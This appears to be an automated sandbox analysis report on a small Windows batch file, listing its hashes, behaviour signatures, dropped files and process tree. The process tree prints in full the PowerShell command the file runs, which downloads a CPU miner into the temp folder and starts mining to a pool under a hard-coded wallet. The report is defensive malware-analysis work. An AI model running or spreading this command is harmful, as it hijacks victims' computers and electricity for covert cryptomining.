f1afc81fa5c304ba261d76f1941e54ebe25a3a7651b0a45e646183382ec03bc4

Analysis

max time kernel
1798s
max time network
1808s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
03/02/2024, 05:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

508B
MD5

d9af861fbfd5f212c2db65e7ed0cd376
SHA1

f9316adde0463e645cc0624f645faad3b972320a
SHA256

f1afc81fa5c304ba261d76f1941e54ebe25a3a7651b0a45e646183382ec03bc4
SHA512

92eb6c1e2a0e1cf196c97c9e9a9f3c53967f9ae58a2b675ce18e967b0e414e6b17ade6e914e96817df1878bbe11022b4737bae0d4078a257de9a132eb1a91536

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	4480	powershell.exe
4	4480	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4860	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4860	cpuminer-sse2.exe
4860	cpuminer-sse2.exe
4860	cpuminer-sse2.exe
4860	cpuminer-sse2.exe
4860	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4480	powershell.exe
4480	powershell.exe
4480	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4480	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4868 wrote to memory of 4480	4868	cmd.exe	75
PID 4868 wrote to memory of 4480	4868	cmd.exe	75
PID 4480 wrote to memory of 4476	4480	powershell.exe	77
PID 4480 wrote to memory of 4476	4480	powershell.exe	77
PID 4476 wrote to memory of 4860	4476	cmd.exe	78
PID 4476 wrote to memory of 4860	4476	cmd.exe	78

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4480
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4860

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2wutgvos.bjs.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.0MB

MD5
29aef19f63cc51a8e1c184aad634efaa

SHA1
0242ddd710ffc4f8903ca05b426b3d08ca104f2c

SHA256
0cd80f4ce3c48e2f3381932fcacb8e0880e372ebafe95bc3fe029c4064ab95a4

SHA512
bdaf49638247179211403e6fad9e9b2e3a6ba5df62354c19a3f531498844ab658756c77f15009d76746c7f49c397ce2ef0ce6492e0ef28515fc8d339682b9b1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
1.6MB

MD5
92b01bff265f8c81752a9ce6a13f5868

SHA1
08e9471f87a4be3780adb7a747a72f66ea847366

SHA256
5b6f4c4377c857893387ec8d0dc2fbba30a6683f81d1e234242684fecbcbacac

SHA512
aba2f973a656fd4265ae5002f4108bf1a3cabbee3406c0ec42850bc0f0891b8e47d1f83bd37eb5d779b1255410ce2832ef8631b5da835abc20b192380afc462c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
829KB

MD5
8656115563b116872577c08dd924936d

SHA1
174595fc0d9ebced0c158d22c460ea1f955816f5

SHA256
2f09125f0359f2d603de5204cc4012a1fc79aadf6f4f758535b926ad3cafd488

SHA512
88ccb3c24d68605de7e8aaf4f8b5a20fb82f4bdfc4f26932c08065b05f55c2e178354d35c8719b757656dbc82081c8a81ce172d7ba1a061305dd71934dff6e8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
1.4MB

MD5
ce7bf3b01566d985d7674ef028a6b92d

SHA1
79e85395b395decc64dd69ef916c3212d6d0e378

SHA256
197cde3eb442734c9ea6ca74e43a2a2dbcbfeabe4c8c64406b7d4414fdfa9c53

SHA512
f3a6dfe8fb38d8f1fd1f6e8cdbe8347dcb9a279bad523dc94d3da24e63dd477a117ee4cd353ec040954622f2742b0abce56f5a0549ed118f283d36172bea23dd

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
3130c1badf4fcb20b5c9126b8dcf7b9a

SHA1
9b0c69d47fec5503f9b1e8c04c875f54f14f169a

SHA256
3153437f0108c1fe94b76cafb1acc13f957e3d29aaa8affe43402c1aadf01fd5

SHA512
438a640d447a66d114f40cb41b38159b4e4753b0dc4f8159da283317a4fc76e4e3492561be16c0670787a03e7c0171ebdfe0ece60b7161a1dba047ddc866467c

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
693KB

MD5
6c0e74f5029240798f6046a52bc0f931

SHA1
483c3cda7f85d2102f98f6f0b2ce4c2004be17c5

SHA256
b391d99149eccbe330900427b98ab4c823b3575f50564302aabc2e0bd94ac0f2

SHA512
d5869fc7763c24054f592d5aae3085675b671fd38f001421d761868d6f4711a9558babf9165a2d62d82727241c5ab51e5eec0a93444252f483328744513a972a

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
833KB

MD5
d5e4ed18289e2c5668b0ee72836cc24a

SHA1
31778be6da563a216630c4a0b9fc6b6b0df93515

SHA256
c7be0a7a502fcc937ae0598cf62b862207e10658cd59cd967c4bf4b4bd67f4c5

SHA512
cd33770903e8522db84a19350c91a34b849c4ee55f1560a6e244fb663aace5991d30e51faeab44d2e2414f3d93b61bab3bb27b1de6b136e0175cee139a26386a

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/4480-31-0x00000202477F0000-0x0000020247806000-memory.dmp

Filesize
88KB

Download
memory/4480-34-0x00000202472E0000-0x00000202472F0000-memory.dmp

Filesize
64KB

Download
memory/4480-55-0x0000020247F00000-0x0000020247F12000-memory.dmp

Filesize
72KB

Download
memory/4480-68-0x00000202473C0000-0x00000202473CA000-memory.dmp

Filesize
40KB

Download
memory/4480-111-0x00007FFF96E80000-0x00007FFF9786C000-memory.dmp

Filesize
9.9MB

Download
memory/4480-33-0x00007FFF96E80000-0x00007FFF9786C000-memory.dmp

Filesize
9.9MB

Download
memory/4480-4-0x00000202473E0000-0x0000020247472000-memory.dmp

Filesize
584KB

Download
memory/4480-28-0x00000202472E0000-0x00000202472F0000-memory.dmp

Filesize
64KB

Download
memory/4480-13-0x0000020247820000-0x0000020247896000-memory.dmp

Filesize
472KB

Download
memory/4480-10-0x00000202472E0000-0x00000202472F0000-memory.dmp

Filesize
64KB

Download
memory/4480-8-0x00000202472E0000-0x00000202472F0000-memory.dmp

Filesize
64KB

Download
memory/4480-9-0x0000020247690000-0x000002024779E000-memory.dmp

Filesize
1.1MB

Download
memory/4480-6-0x0000020247390000-0x00000202473B2000-memory.dmp

Filesize
136KB

Download
memory/4480-7-0x00007FFF96E80000-0x00007FFF9786C000-memory.dmp

Filesize
9.9MB

Download
memory/4480-5-0x0000020247350000-0x0000020247360000-memory.dmp

Filesize
64KB

Download
memory/4860-124-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4860-127-0x0000000064AB0000-0x0000000064B48000-memory.dmp

Filesize
608KB

Download
memory/4860-126-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4860-125-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4860-128-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/4860-134-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4860-139-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4860-142-0x0000000064AB0000-0x0000000064B48000-memory.dmp

Filesize
608KB

Download
memory/4860-149-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4860-154-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4860-157-0x0000000064AB0000-0x0000000064B48000-memory.dmp

Filesize
608KB

Download
memory/4860-169-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4860-172-0x0000000064AB0000-0x0000000064B48000-memory.dmp

Filesize
608KB

Download
memory/4860-179-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4860-184-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4860-187-0x0000000064AB0000-0x0000000064B48000-memory.dmp

Filesize
608KB

Download